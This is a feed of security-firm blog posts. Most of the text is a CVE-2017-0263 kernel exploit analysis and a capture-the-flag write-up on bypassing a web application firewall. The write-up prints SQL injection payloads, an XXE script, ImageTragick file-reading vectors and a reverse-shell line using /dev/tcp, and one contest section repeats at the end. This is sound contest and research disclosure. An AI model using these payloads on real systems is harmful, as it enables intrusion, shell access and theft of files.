↧
PostMessage Security in Chrome extensions at Owasp London
↧
Our new R&D center in Brno
We are pleased to announce the opening of our brand new R&D center Brno, Czech Republic, which will focus on developing products to secure mobile telecommunications systems.
Why Brno?
As part of our global growth strategy to be closer to customers all over the world, we are seeking to open sales offices and development centers in a diverse range of countries.
Brno is the perfect place for an R&D center. Besides being a good geographic location, the city is home to development centers of numerous major IT and information security companies such as IBM, NetSuite, Red Hat and AVG Technologies. The local workforce is also young and well-educated with 90,000 of the city's 350,000 residents being students, the kind of people who thrive at PT.
The first employees in our Brno office
Big plans ahead
The new office is designed for 35–50 people and we plan to ramp up to full capacity over time. Given the demand and market opportunity, we are prioritizing the development team for SS7 security products – so if you are interested in mobile network security, please get in touch. That said, we will certainly be looking at opportunities to build other security products and increase our overall talent pool in the area. So, if you are an inquiring mind with a thirst for knowledge and an interest in information security R&D, drop us a line!
Our office is on the first floor of Spielberk Office Centre, along with AVG Technologies, SolarWinds, and Xura
Author: Maxim Shiyanovsky, Managing Director at Positive Technologies.
↧
↧
Intel and Lenovo have restricted access to debugging interface of CPUs after Positive Technologies' revelations
Intel and Lenovo have released recommendations that help restrict access to JTAG debugging interface of processors which can be used by attackers. The insecurity was first discovered by Positive Technologies’ experts in December 2016.
At that time Positive Technologies’ experts Maxim Goryachiy and Mark Ermolov presented their findings, during a session at the Chaos Communication Congress (33C3) in Hamburg, explaining that modern Intel processors allow usage of the debugging interface via a USB 3.0 port available on many platforms to gain full control over the system. Modern security systems cannot detect such attacks.
In April 2017 Intel officially acknowledged this vulnerability and released a BIOS update that blocks access to the debugging interface via USB 3.0 port. It also thanked Positive Technologies’ experts Maxim Goryachiy and Mark Ermolov for raising the issue.
In addition, a special security bulletin was published by Lenovo, one of the main equipment manufacturers that uses Intel processors. Several other major vendors have not yet issued recommendations for blocking the attack.
A video of Maxim Goryachiy and Mark Ermolov talk at CCC 33C3 can be found below:
Slides are available here.
↧
Bank employees using social networks at work: danger or mere distraction?
Banks always have been a lure for attackers, and while new technologies help to improve client service, they also create additional information security risks.
Cyberattacks on banks frequently start with criminals persuading employees of a financial institution to open specially crafted malware. Positive Technologies expert Timur Yunusov explains below if it makes sense for banks to ban workplace use of social networks to reduce the risk of such attacks.
Employees: the weak link in security
Most cyberattacks on banking infrastructure rely on social engineering. By smoothly manipulating bank employees in correspondence or conversation, criminals frequently manage to penetrate a bank’s internal network. In the case of a targeted attack directed at many bank employees—we know of attacks targeting 10 to 50 (or even more) employees at the same time—we can safely assume that at least one of them will open malware attached to an email message, therefore infecting that employee’s computer.
Research performed by Positive Technologies demonstrates that information security awareness among employees remains low. Employees often open potentially malicious attachments and act in a way that may jeopardize the security of the company's infrastructure. Unfortunately, awareness is still low at companies where employees undergo information security training.
One of the most effective tools for a hacker is the telephone—in 100 percent of cases with the clients we audited, our testers managed to convince the employee on the other end of the line to open the malicious file they had previously sent, or even to disclose the employee’s user name and password. Bank employees are a weak link in security, and therefore financial institutions have to think about how to reduce the risk of attacks on their staff.
Putting the social network controversy in perspective
Considering all the above, banning workplace use of social networks might seem to be a safe and sensible step. After all, popular online services are another way for attackers to spread malware.
But in reality, social networks are less useful for fraudsters than the phone, for instance. To persuade employees to perform a certain action, attackers first need to create relationships and earn trust. Targeted attacks via social networks are a time-consuming process that usually takes a week or more. Timing is trickier too, since if the attacker sends the malicious software or link when the employee is at home, the malware will infect the employee’s computer, instead of a bank computer.
Sometimes attackers hack the accounts of the target employee’s friends. In this case, success is more likely because people trust their friends more than they trust strangers. But performing this attack at any kind of scale against bank employees via social networks is quite difficult and has no guarantees of success. Overall, emails and phone calls are much more effective for hackers.
To ban or not to ban
Statistics show that employees of financial institutions are at risk and are the logical first target for hackers. Many methods are available to hackers for this purpose, including social networking websites.
But banning use of social networks may actually be counterproductive. After a ban, employees could switch over to other communication methods (for example, email and phone) that are statistically riskier with respect to social engineering.
In addition, outright prohibitions may not work and instead push employees to seek dangerous workarounds. At a minimum, any ban must be reinforced by training to educate employees on the basics of information security.
The more effective and reliable choice for banks and other businesses is to combine security awareness training with use of special protection and attack detection tools, such as security information and event management (SIEM) and web application firewall (WAF) solutions.
↧
Intel ME: The Way of Static Analysis
Image: Clive Darra, Flickr
Intel Management Engine (ME) has been known for over 10 years (since 2005), but official Internet sources about ME are few and far between. Fortunately, excellent works on the topic have been published in recent years. However, all of them deal with ME 10 and earlier, while modern computers implement ME 11, which was introduced in 2015 for the Skylake microarchitecture.
If you have never heard about ME, this is a good time to check out great slides from Igor Skochinsky about previous versions of ME.
In short, ME is a separate processor embedded in the chipset of any modern computer with an Intel CPU. ME runs even when the computer is sleeping or powered off (as long as it is plugged in to a power outlet). ME can access any part of RAM, but the RAM region used by ME is not accessible from the OS. What’s more, ME is capable of out-of-band access to the network adapter.
The most recent version of ME is 11. Older versions of ME were based on the ARCtangent/ARCompact/SPARC architecture, but version 11 is x86-based. This is helpful for us researchers since x86 is much more convenient (thanks to more available tools and past research to refer to).
However, ME v11 uses a different layout of data within the firmware image and old tools are unable to handle this layout properly. ME v11 also uses an unknown set of Huffman tables (which are required to decompress many modules embedded in firmware). This all makes it very difficult to start exploration of ME internals…
Playing with system tools
Intel is known to have at least two sets of tools for ME.The first set, called “Intel ME System Tools,” is available to OEMs/vendors (think Acer, Gigabyte, Dell). This can be used to fine-tune ME firmware before delivering it to the end user. Fortunately for us, vendors often include these tools in the distribution package of BIOS updates, thus making them available to the general public.
The second set of tools is used internally within Intel and able to do almost anything with ME (including Huffman compression). We have never heard about any leaks of these tools, however.
We have collected many ME firmware images on the Internet and extracted some information about ME modules. Unfortunately, several modules with promising names are always Huffman-compressed and not amenable to analysis. These module names include kernel, syslib (System Library), bup (Bring-Up), and amt (Active Management Technology).
We started playing with Manifest Extension Utility (meu.exe) from ME System Tools and discovered that we could generate an XML file containing the text string “NOT_COMPRESSED”. We looked inside meu.exe and located an identical string. However, these strings are not referenced anywhere in code…
Explaining observations
After analysis, we found that the meu.exe binary contains an embedded file system that uses data compression and is accessible via the Qt Resource System interface. The same applies to Flash Image Tool (fit.exe). We extracted all embedded files and briefly analyzed them.Some files appear to be XML (human-readable) and contain helpful information (meaningful names and comments) about the binary format of internal structures (extensions) used in Code Partition Manifest and Module Metadata. Therefore, after interpreting the XML data, we were able to understand almost every field in Manifest and Metadata.
Metadata analysis can suggest many interesting conclusions. For example, we were able to find a list of internal device names and check access permissions (which module is permitted to access which device).
ROM bypass
We were lucky to find several ME firmware images that contain a ROM bypass partition—code and data that could be used instead of the ROM in case of errors in non-updatable areas of ME.The ROM bypass is not too big and can be analyzed in full. Some logic (related to memory-mapped devices and data obtained from them) can only be guessed at, but the process of loading and verifying the startup module (named rbe) seems straightforward.
Funny findings
We are still unable to build an overall picture of ME, due to Huffman compression of the kernel and syslib code. However, it is possible to analyze TXE (Trusted Execution Engine, the equivalent of ME for Intel Atom CPUs) thanks to the absence of Huffman compression.In addition, when we looked inside the decompressed vfs module, we encountered the strings “FS: bogus child for forking” and “FS: forking on top of in-use child,” which clearly originate from Minix3 code. It would seem that ME 11 is based on the MINIX 3 OS developed by Andrew Tanenbaum :)
Conclusion
Analyzing ME is a complicated task, and the work we have described here would be no more than 1% of the total. We hope that our findings will help other researchers so we can all learn more about Intel ME in the near future!Author: Dmitry Sklyarov, Positive Technologies
↧
↧
A closer look at the CVE-2017-0263 privilege escalation vulnerability in Windows
May has been a busy month for vulnerabilities in the world's most popular desktop operating system. Hackers have made headlines with massive infections by WannaCry ransomware, which exploits an SMB security flaw and the ETERNALBLUE tool. Shortly prior, on May 9, Microsoft fixed CVE-2017-0263, which had made it possible for attackers to gain maximum system privileges on PCs running Windows 10, Windows 8.1, Windows 7, Windows Server 2008, Windows Server 2012, and Windows Server 2016.
Vulnerability CVE-2017-0263 had been used already in phishing messages. The emails contained an exploit that first entered the system by taking advantage of incorrect handling of EPS files by Microsoft Office (CVE-2017-0262) and then, once on the inside, leveraged CVE-2017-0263 to get full administrator rights. Two years ago we looked at a similar vulnerability in Windows, and here we will see how the new CVE-2017-0263 opens the way to "pwning" remote workstations and servers.
In a word, this is a use-after-free vulnerability (CWE-416)—when context menu windows were closed and the memory occupied by the menu was freed up, the pointer to the freed-up memory was not zeroed out. As a result, the pointer could be reused.
The below discussion covers the process of window handling in the win32k.sys driver and how this process makes it possible to exploit the vulnerability.
Context menus
Every Windows user is familiar with context menus. These are the menus that drop down when we right-click.The appearance of this menu and how it is displayed are completely up to the developer of each application. WinAPI provides developers with the TrackPopupMenuExfunction, which causes a context menu to appear with the specified parameters at the specified location on the screen.
The state of the context menu is stored in the kernel in the variable win32k!gMenuState, which is a win32k!tagMENUSTATE structure:
0: kd> dt win32k!tagMenuState
+0x000 pGlobalPopupMenu : Ptr32 tagPOPUPMENU
+0x004 flags : Int4B
+0x008 ptMouseLast : tagPOINT
+0x010 mnFocus : Int4B
+0x014 cmdLast : Int4B
+0x018 ptiMenuStateOwner : Ptr32 tagTHREADINFO
+0x01c dwLockCount : Uint4B
+0x020 pmnsPrev : Ptr32 tagMENUSTATE
+0x024 ptButtonDown : tagPOINT
+0x02c uButtonDownHitArea: Uint4B
+0x030 uButtonDownIndex : Uint4B
+0x034 vkButtonDown : Int4B
+0x038 uDraggingHitArea : Uint4B
+0x03c uDraggingIndex : Uint4B
+0x040 uDraggingFlags : Uint4B
+0x044 hdcWndAni : Ptr32 HDC__
+0x048 dwAniStartTime : Uint4B
+0x04c ixAni : Int4B
+0x050 iyAni : Int4B
+0x054 cxAni : Int4B
+0x058 cyAni : Int4B
+0x05c hbmAni : Ptr32 HBITMAP__
+0x060 hdcAni : Ptr32 HDC__
Note that all of the call stacks and structures presented here are taken from Windows 7 x86. The 32-bit OS version is used for convenience: arguments for most functions are stored on the stack and there is no WoW64 layer, which during system calls switches to a 64-bit stack due to which 32-bit stack frames are lost when the call stack is printed. A full list of vulnerable operating systems is given on the Microsoft website.
The win32k!tagMENUSTATE structure stores, for example, such information as: the clicked region of the screen, number of the most recent menu command, and pointers to the windows that were clicked or selected for drag-and-drop. The list of context menu windows is stored in the first field, pGlobalPopupMenu, which is of the type win32k!tagPOPUPMENU:
0: kd> dt win32k!tagPopupMenu
+0x000 flags : Int4B
+0x004 spwndNotify : Ptr32 tagWND
+0x008 spwndPopupMenu : Ptr32 tagWND
+0x00c spwndNextPopup : Ptr32 tagWND
+0x010 spwndPrevPopup : Ptr32 tagWND
+0x014 spmenu : Ptr32 tagMENU
+0x018 spmenuAlternate : Ptr32 tagMENU
+0x01c spwndActivePopup : Ptr32 tagWND
+0x020 ppopupmenuRoot : Ptr32 tagPOPUPMENU
+0x024 ppmDelayedFree : Ptr32 tagPOPUPMENU
+0x028 posSelectedItem : Uint4B
+0x02c posDropped : Uint4B
+0x030 ppmlockFree : Ptr32 tagPOPUPMENU
In both structures we have highlighted the fields of interest, which will be used below to describe the exploitation process.
The variable win32k!gMenuState is initialized when a context menu is created, during the previously mentioned TrackPopupMenuEx function. Initialization occurs when win32k!xxxMNAllocMenuState is called:
1: kd> k
# ChildEBP RetAddr
00 95f29b38 81fe3ca6 win32k!xxxMNAllocMenuState+0x7c
01 95f29ba0 81fe410f win32k!xxxTrackPopupMenuEx+0x27f
02 95f29c14 82892db6 win32k!NtUserTrackPopupMenuEx+0xc3
03 95f29c14 77666c74 nt!KiSystemServicePostCall
04 0131fd58 7758480e ntdll!KiFastSystemCallRet
05 0131fd5c 100015b3 user32!NtUserTrackPopupMenuEx+0xc
06 0131fd84 7756c4b7 q_Main_Window_Class_wndproc (call TrackPopupMenuEx)
And when the context menu is no longer needed—for example, the user selected a menu item or clicked outside of the menu—the function win32k!xxxMNEndMenuState is called and frees up the state of the menu:
1: kd> k
# ChildEBP RetAddr
00 a0fb7ab0 82014f68 win32k!xxxMNEndMenuState
01 a0fb7b20 81fe39f5 win32k!xxxRealMenuWindowProc+0xd46
02 a0fb7b54 81f5c134 win32k!xxxMenuWindowProc+0xfd
03 a0fb7b94 81f1bb74 win32k!xxxSendMessageTimeout+0x1ac
04 a0fb7bbc 81f289c8 win32k!xxxWrapSendMessage+0x1c
05 a0fb7bd8 81f5e149 win32k!NtUserfnNCDESTROY+0x27
06 a0fb7c10 82892db6 win32k!NtUserMessageCall+0xcf
07 a0fb7c10 77666c74 nt!KiSystemServicePostCall
08 013cfd90 77564f21 ntdll!KiFastSystemCallRet
09 013cfd94 77560908 user32!NtUserMessageCall+0xc
0a 013cfdd0 77565552 user32!SendMessageWorker+0x546
0b 013cfdf0 100014e4 user32!SendMessageW+0x7c
0c 013cfe08 775630bc q_win_event_hook (call SendMessageW(MN_DODRAGDROP))
Important here is that the gMenuState.pGlobalPopupMenu field is updated only during initialization in the xxxMNAllocMenuState function—it is not zeroed out when the structure is destroyed.
xxxMNEndMenuState function
This function is the star of our story. Its handful of lines harbor the vulnerability.
xxxMNEndMenuState starts with deinitialization and freeing of information related to the context menu. The MNFreePopup function—to which we will return in the following section—is called. The main task of MNFreePopup is to decrement reference counters for windows related to the particular context menu. When the reference count falls to zero, this decrementing can cause the window to be destroyed.
Then the xxxMNEndMenuState function checks the fMenuWindowRef flag of the pGlobalPopupMenu field to see if any references remain to the main window of the context menu. This flag is cleared upon destruction of the window contained in the spwndPopupMenu field of the context menu:
3: kd> k
# ChildEBP RetAddr
00 95fffa5c 81f287da win32k!xxxFreeWindow+0x847
01 95fffab0 81f71252 win32k!xxxDestroyWindow+0x532
02 95fffabc 81f7122c win32k!HMDestroyUnlockedObject+0x1b
03 95fffac8 81f70c4a win32k!HMUnlockObjectInternal+0x30
04 95fffad4 81f6e1fc win32k!HMUnlockObject+0x13
05 95fffadc 81fea664 win32k!HMAssignmentUnlock+0xf
06 95fffaec 81fea885 win32k!MNFreePopup+0x7d
07 95fffb14 8202c3d6 win32k!xxxMNEndMenuState+0x40
xxxFreeWindow+83f disasm:
.text:BF89082E loc_BF89082E:
.text:BF89082E and ecx, 7FFFFFFFh ; ~fMenuWindowRef
.text:BF890834 mov [eax+tagPOPUPMENU.flags], ecx
As seen above, the flag is discarded and therefore the memory occupied by the pGlobalPopupMenu field is freed up, but the pointer itself is not zeroed out. This causes a dangling pointer, which under certain circumstances can be reused.
Immediately after the context menu memory is freed up, the execution flow deletes the references stored in the context menu state structure that relate to clicked windows (uButtonDownHitArea field) when the menu was active or were selected for drag-and-drop (uDraggingHitArea field).
Exploitation method
A window object in the kernel is described by a tagWND structure. There we describe the concept of kernel callbacks, which will be needed here as well. The number of active references to a window is stored in the cLockObj field of the tagWND structure.
Deleting references to a window, as shown in the previous section, can cause the window itself to be destroyed. Before the window is destroyed, a WM_NCDESTROY change-of-window-state message is sent to the window.
This means that while xxxMNEndMenuState is running, control can be transferred to user application code—specifically, to the window procedure of the window being destroyed. This happens when no references remain to a window whose pointer is stored in the gMenuState.uButtonDownHitArea field.
2: kd> k
# ChildEBP RetAddr
0138fc34 7756c4b7 q_new_SysShadow_window_proc
0138fc60 77565f6f USER32!InternalCallWinProc+0x23
0138fcd8 77564ede USER32!UserCallWinProcCheckWow+0xe0
0138fd34 7755b28f USER32!DispatchClientMessage+0xcf
0138fd64 77666bae USER32!__fnNCDESTROY+0x26
0138fd90 77564f21 ntdll!KiUserCallbackDispatcher+0x2e
95fe38f8 81f56d86 nt!KeUserModeCallback
95fe3940 81f5c157 win32k!xxxSendMessageToClient+0x175
95fe398c 81f5c206 win32k!xxxSendMessageTimeout+0x1cf
95fe39b4 81f2839c win32k!xxxSendMessage+0x28
95fe3a10 81f2fb00 win32k!xxxDestroyWindow+0xf4
95fe3a24 81f302ee win32k!xxxRemoveShadow+0x3e
95fe3a64 81f287da win32k!xxxFreeWindow+0x2ff
95fe3ab8 81f71252 win32k!xxxDestroyWindow+0x532
95fe3ac4 81f7122c win32k!HMDestroyUnlockedObject+0x1b
95fe3ad0 81f70c4a win32k!HMUnlockObjectInternal+0x30
95fe3adc 81f6e1fc win32k!HMUnlockObject+0x13
95fe3ae4 81fe4162 win32k!HMAssignmentUnlock+0xf
95fe3aec 81fea8c3 win32k!UnlockMFMWFPWindow+0x18
95fe3b14 8202c3d6 win32k!xxxMNEndMenuState+0x7e
For example, in the call stack shown above, the WM_NCDESTROY message is handled by the window procedure for the SysShadow window class. Windows of this class are designed to provide shadowing and are usually destroyed together with the windows for which they are shadowing.
Now let's see the most interesting part of how this window message is handled, in the form that was found in the malware sample taken from a .docx phishing attachment:
When the attacker takes control, the first matter of business is to occupy the now-free memory that was just occupied by gMenuState.pGlobalPopupMenu, in order to reuse this pointer later. Attempting to allocate the indicated memory block, the exploit performs a large number of SetClassLongW calls, thus setting a specially formed menu name for window classes that have been specially created for this purpose:
2: kd> k
# ChildEBP RetAddr
00 9f74bafc 81f240d2 win32k!memcpy+0x33
01 9f74bb3c 81edadb1 win32k!AllocateUnicodeString+0x6b
02 9f74bb9c 81edb146 win32k!xxxSetClassData+0x1d1
03 9f74bbb8 81edb088 win32k!xxxSetClassLong+0x39
04 9f74bc1c 82892db6 win32k!NtUserSetClassLong+0xc8
05 9f74bc1c 77666c74 nt!KiSystemServicePostCall
06 0136fac0 7755658b ntdll!KiFastSystemCallRet
07 0136fac4 775565bf user32!NtUserSetClassLong+0xc
08 0136fafc 10001a52 user32!SetClassLongW+0x5e
09 0136fc34 7756c4b7 q_new_SysShadow_window_proc (call SetClassLongW)
After the memory is occupied, the next stage begins. The exploit accesses the NtUserMNDragLeave system procedure, which performs a nested call of the xxxMNEndMenuState function. Clearing of the gMenuState structure starts again:
2: kd> k
# ChildEBP RetAddr
00 9f74bbf0 8202c3d6 win32k!xxxMNEndMenuState
01 9f74bc04 8202c40e win32k!xxxUnlockMenuStateInternal+0x2e
02 9f74bc14 82015672 win32k!xxxUnlockAndEndMenuState+0xf
03 9f74bc24 82001728 win32k!xxxMNDragLeave+0x45
04 9f74bc2c 82892db6 win32k!NtUserMNDragLeave+0xd
05 9f74bc2c 100010a9 nt!KiSystemServicePostCall
06 0136fafc 10001a84 q_exec_int2e (int 2Eh)
07 0136fc34 7756c4b7 q_new_SysShadow_window_proc (call q_exec_int2e)
As described in the previous section, the procedure starts by deinitializing the pGlobalPopupMenu field; this process is performed by the MNFreePopup call, which decrements the reference counters for windows contained in various fields of tagPOPUPMENU. After the prior step, the content of this structure is now controlled by the attacker. So when the described chain of actions is performed, the attacker gets a decrement primitive to an arbitrary kernel address.
In this exploit, an address is inserted in the tagPOPUPMENU.spwndPrevPopup field and the primitive is used to decrement the field for flags of one of the windows, causing that window to be marked with the flag bServerSideProc, which means that its window procedure is run in the kernel.
As the code shows, immediately after returning from NtUserMNDragLeave, a message is sent to the window by a SendMessage call, causing arbitrary kernel code execution. At this stage, the attacker usually steals a system process token to obtain system privileges. Indeed, this is what happened in the exploit here.
In conclusion
What are the salient points of the exploit? The most common cause of vulnerabilities in the win32k.sys library is access to callbacks in user space when any kernel structures are in an intermediate stage when a transaction is changing them. Setting the bServerSideProc flag for a window is also a popular method for kernel code execution. In addition, the most convenient method to leverage kernel code execution for privilege escalation is to copy a reference to a system token.
In that sense, the exploit looks rather mundane. At the same time many of the nuances have been simplified or purposefully omitted from this discussion.
For example, we did not dwell on the exact appearance of the context menu or menu-related actions that cause the necessary state of the flags and fields of the win32k!gMenuState variable during execution of the xxxMNEndMenuState procedure. Left unmentioned was the fact that the menu names set during SetClassLong calls should, on the one hand, be a Unicode string with no null characters but, on the other hand, be a legitimate tagPOPUPMENU structure. This also means that the address of the window in the kernel (to which the decrement field will refer) must not contain any wchar_t null characters. These are just a few examples from a rather long list.
As for the update that fixes the vulnerability, a quick glance shows that the buffer addressed by the gMenuState.pGlobalPopupMenu field is now freed closer to the end of the xxxMNEndMenuState function, much later after the MNFreePopup and UnlockMFMWPWindow calls, and is accompanied by zeroing-out of the pointer. Thus the patch addresses two causes whose simultaneous presence caused the vulnerability to occur.
↧
Positive Technologies expert helps to fix vulnerability in Viber for Windows
Viber has fixed a vulnerability in the company's Windows client found by a group of security experts, which included a Positive Technologies researcher. This security bug enabled attackers to steal data needed for user authentication in Windows. Users urged to update to Viber version 6.7.2
"In essence, when a link resembling http://host/img.jpg is sent during a chat, Viber would first load it as the client who sent the link. If a picture is hosted at the indicated URL, then Viber would try to download it as the receiving client. This scheme would work only if the initiating client confirmed the presence of a picture at that URL," explained Timur Yunusov, Head of the Banking Security Unit at Positive Technologies.
If the server sent a 401 "authentication required" message (instead of a picture) in response to the second request and then asked for NTLM authentication, Viber would send the user's NTLM hash.
In addition, the vulnerability made it possible to force the client to send arbitrary GET requests. This attack could, for example, be used to reprogram home routers and other devices.
"This vulnerability could be used only by an attacker whose mobile phone number was saved in the user's contact list. Therefore no mass attack on Windows users was possible. We also note that a successful attack generally required performing a whole series of GET requests, meaning that the attacker would need to send multiple links to a potential victim," commented the Viber press service. "Around six percent of our active users in Russia have used the Windows client at least once in the last month to send a message, perform calls, or view public chats."
The vulnerability in the Viber client for Windows has been fixed as of Viber version 6.7.2, which is currently available for download.
↧
WAF Bypass at PHDays VII: Results and Answers
Continuing the tradition of past years, the WAF Bypass contest was held at last month's PHDays. Participants tried to bypass PT Application Firewall protection mechanisms in order to find special flags accessible through vulnerabilities specially left in web applications. In a series of challenges, the organizers disabled different features of PT Application Firewall, leaving a "way in" for participants to take advantage of. The focus of attention this time was a prototype database firewall (DBFW), which analyzed SQL traffic from applications to databases.
350 points
For this challenge, participants had to find a way around detection of SQL injections. A PHP module, replacing the original mysql_query() function with one of its own, was installed on the application server. In this function, the values of HTTP parameters (GET, POST, Cookie) are added to the start of an SQL query in the form of a comment.
After an SQL query from the application is sent to the database using a variable function, the query is intercepted by the DBFW. The DBFW extracts the values of HTTP parameters from the comment and looks for them in the SQL query. If a substring matching the parameter value is found, it is replaced by a constant. Then the two queries are tokenized: before replacement and after. If the number of tokens does not match, this indicates SQL injection. The basic principle is that the clearest sign of an injection attack is a change in the parsing tree. If the number of tokens has changed, then the parsing tree has changed, which means that injection has occurred.
We talked more about the logic of this algorithm in the talk "Database Firewall from Scratch", in which we shared our experience researching DBFW mechanisms. Those who saw the talk were surely aware of the main drawback of this approach: comparing token numbers is not a 100% reliable method, since it is possible to alter the parsing tree in a way that the number of tokens in the original and analyzed queries will still match. An attacker could add comments in a way that the number of tokens in the two queries is the same, even though the tokens themselves are different. The correct way is to build and compare abstract syntax trees (AST) of the two queries. So to complete this challenge, participants needed to create a vector that would have the same number of tokens as the original, injection-free query:
/post.php?p=-1 union select 1,2,(select flag from flags order by id,1),4 -- -
Participants found a flaw in our ANTLR parser for MySQL. The reason is that MySQL supports conditional comments using the notation /*! … */. Everything inside such a comment will be run by MySQL, but other databases will ignore it.
http://task1.waf-bypass.phdays.com/post.php?p=(select /*!50718 ST_LatFromGeoHash((SELECT table_name FROm information_schema.tables LIMIT 1)) */) and true and true and true order by id desc limit 10 -- (Arseny Sharoglazov)
http://task1.waf-bypass.phdays.com/post.php?p=/*!1111111 union select 1 id,flag,1,1 from flags where 1*/ (Sergey Bobrov)
For the second challenge, participants had access to an application that allowed adding notes. The full SQL query was passed in hex in parameter p:
http://task2.waf-bypass.phdays.com/notes.php?q=53454c454354207469746c652c20626f64792046524f4d206e6f746573204c494d4954203235 (SELECT title, body FROM notes LIMIT 25 )
In the ALFAScript language, wet set an attribute-based access control (ABAC) policy allowing users to perform only INSERT, UPDATE and SELECT for the notes table only. Therefore, access to the flags table was blocked. But we left a way around this restriction by allowing CREATE. Our intended solution involved creating an event (https://dev.mysql.com/doc/refman/5.7/en/create-event.html) that writes a flag to the notes table:
CREATE EVENT `new_event` ON SCHEDULE EVERY 60 SECOND STARTS CURRENT_TIMESTAMP ON COMPLETION NOT PRESERVE ENABLE COMMENT '' DO insert into notes (title, body) VALUES ((select flag from flags limit 1), 2)
Besides CREATE EVENT, participants could use CREATE TABLE to get a flag in a MySQL message after first causing an error (solution by Arseny Sharoglazov):
CREATE TABLE ggg AS SELECT ST_LongFromGeoHash (flag) FROM flags;
Sergey Bobrov proposed an alternative method using ON DUPLICATE KEY UPDATE, which enables running UPDATE inside INSERT with a single query:
INSERT INTO notes SELECT 1,2,3 FROM notes,flags as a ON DUPLICATE KEY UPDATE body = flag
Here participants needed to find and exploit a vulnerability in an old version of Adobe BlazeDS. The application used AMF (Action Message Format) for communicating with the server. AMF is a serialized structure with typed fields. One type is XML (0x0b), incorrect parsing of which caused a number of vulnerabilities in libraries for handling AMF, including in BlazeDS.
WAF had a built-in AMF parser, but parsing of external Flex objects— AcknowledgeMessageExt (alias DSK), CommandMessageExt (DSC), AsyncMessageExt (DSA)—was disabled for this challenge. At the same time, BlazeDS could parse such messages and find XML in them, which led to a vulnerability to XXE attacks.
The following request could be created using the pyamf library:
import pyamf
import httplib
import uuid
from pyamf.flex.messaging import RemotingMessage, AcknowledgeMessageExt
from pyamf.remoting import Envelope, Request, decode
hostname = 'task3.waf-bypass.phdays.com'
port = 80
path = '/samples/messagebroker/amf'
request = AcknowledgeMessageExt(
operation="findEmployeesByName",
destination="runtime-employee-ro",
messageId=None,
body=[
'
' ]>'
'External entity 1: &foo; '],
clientId=None,
headers={'DSId': str(uuid.uuid4()).upper(),
'DSEndpoint': 'my-amf'}
)
envelope = Envelope(amfVersion=3)
envelope["/%d" % 1] = Request(u'null', [request])
message = pyamf.remoting.encode(envelope)
conn = httplib.HTTPConnection(hostname, port)
conn.request('POST', path, message.getvalue(),
headers={'Content-Type': 'application/x-amf'})
resp = conn.getresponse()
data = resp.read()
content = decode(data)
print content
BlazeDS was configured to operate via an internal transparent proxy, which added a flag to the header of all outgoing requests.
For this challenge, we used a version of web application Pasteboard that was vulnerable to the Imagetragick attack. WAF was specially configured to filter only the following keywords:
url, caption:, label:, ephemeral:, msl:
However, less-common vectors were still available. One for example, was the text wrapper (unlike label, no @ is required before the file name):
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'text:/etc/passwd'
pop graphic-context
The result was an image with the contents of the /etc/passwd file:
Arseny Sharoglazov used a vector with image over:
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
pop graphic-context
pop graphic-context
In the imagemagick source code, Sergey Bobrov found a pango: wrapper not previously mentioned in public exploits.
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'pango:@/etc/passwd'
pop graphic-context
Participants were given a search form vulnerable to SQL injection. The table with search results contained the publickey field. The challenge was to use SQL injection to get the value of the privatekey field. The following ABAC policy, written in ALFAScript, was used:
namespace example {
export policy Main {
target clause action == "select"
apply denyUnlessPermit
rule r1 {
permit
target clause resource.schema.id == "information_schema"
}
rule r2 {
permit
target clause resource.schema.id == "task5"
and resource.table.id == "users"
and resource.column.id == "publickey"
}
rule r3 {
permit
target clause resource.schema.id == "task5"
and resource.table.id == "users"
and resource.column.id == "name"
}
}
}
Note use of the word denyUnlessPermit. In XACML, there are several types of algorithms for combining elements to describe attribute-based access control policies. Use of the denyUnlessPermit algorithm means that the query will be authorized if and only if at least one of the rules allows granting user access to the resource. The DBFW does not know the real structure of the database, so when it sees a query of the type SELECT a,b from c,d, unlike the database it does not know where column a is located (in table c or table d). In case of such a query, the DBFW must check the user's ability to access all versions of resources. In this example, that would be columns c.a, c.b, d.a, and d.b. So if a query contains at least one authorized column, we can use two tables to extract privatekey:
Petrov' union select name, privatekey from information_schema.columns,users where name = 'Petrov' –
This web application had two functions: loading of CSV files with contact lists and a form for searching contacts, which was vulnerable to SQL injection. A special Dejector mechanism was used by the DBFW for protection.
This method for detecting SQL injection was first detailed by Hansen and Patterson in "Guns and Butter: Towards Formal Axioms of Input Validation". In essence, a set of known web application requests (for example, this set could be obtained using static source-code analysis) is used to build an SQL subgrammar. This grammar is used to generate a parser. If a query is recognized by the parser, this mean that the query belongs to that language; otherwise the query does not belong to the language and is therefore not legitimate.
For this challenge, we prepared a grammar describing the allowed queries. The ability to load CSV files implied that the MySQL user had file operations available. Another hint was in an error: mysqli_multi_query(), enabling stacked queries, was used. The ordinary LOAD_FILE() was forbidden by the grammar but LOAD DATA INFILE was accessible:
'; load data infile '/etc/passwd' into table users character set 'utf8
First and second place were taken by Sergey Bobrov and Arseny Sharoglazov, both from Kaspersky Lab. Third place went to Andrey Semakin, a student at Tyumen State University. Great work!
Arseny Reutov, Dmitry Nagibin, Igor Kanygin, Denis Kolegov, Nikolay Tkachenko, Ivan Khudyashov
Challenge #1 (JJ)
350 points
For this challenge, participants had to find a way around detection of SQL injections. A PHP module, replacing the original mysql_query() function with one of its own, was installed on the application server. In this function, the values of HTTP parameters (GET, POST, Cookie) are added to the start of an SQL query in the form of a comment.
After an SQL query from the application is sent to the database using a variable function, the query is intercepted by the DBFW. The DBFW extracts the values of HTTP parameters from the comment and looks for them in the SQL query. If a substring matching the parameter value is found, it is replaced by a constant. Then the two queries are tokenized: before replacement and after. If the number of tokens does not match, this indicates SQL injection. The basic principle is that the clearest sign of an injection attack is a change in the parsing tree. If the number of tokens has changed, then the parsing tree has changed, which means that injection has occurred.
We talked more about the logic of this algorithm in the talk "Database Firewall from Scratch", in which we shared our experience researching DBFW mechanisms. Those who saw the talk were surely aware of the main drawback of this approach: comparing token numbers is not a 100% reliable method, since it is possible to alter the parsing tree in a way that the number of tokens in the original and analyzed queries will still match. An attacker could add comments in a way that the number of tokens in the two queries is the same, even though the tokens themselves are different. The correct way is to build and compare abstract syntax trees (AST) of the two queries. So to complete this challenge, participants needed to create a vector that would have the same number of tokens as the original, injection-free query:
/post.php?p=-1 union select 1,2,(select flag from flags order by id,1),4 -- -
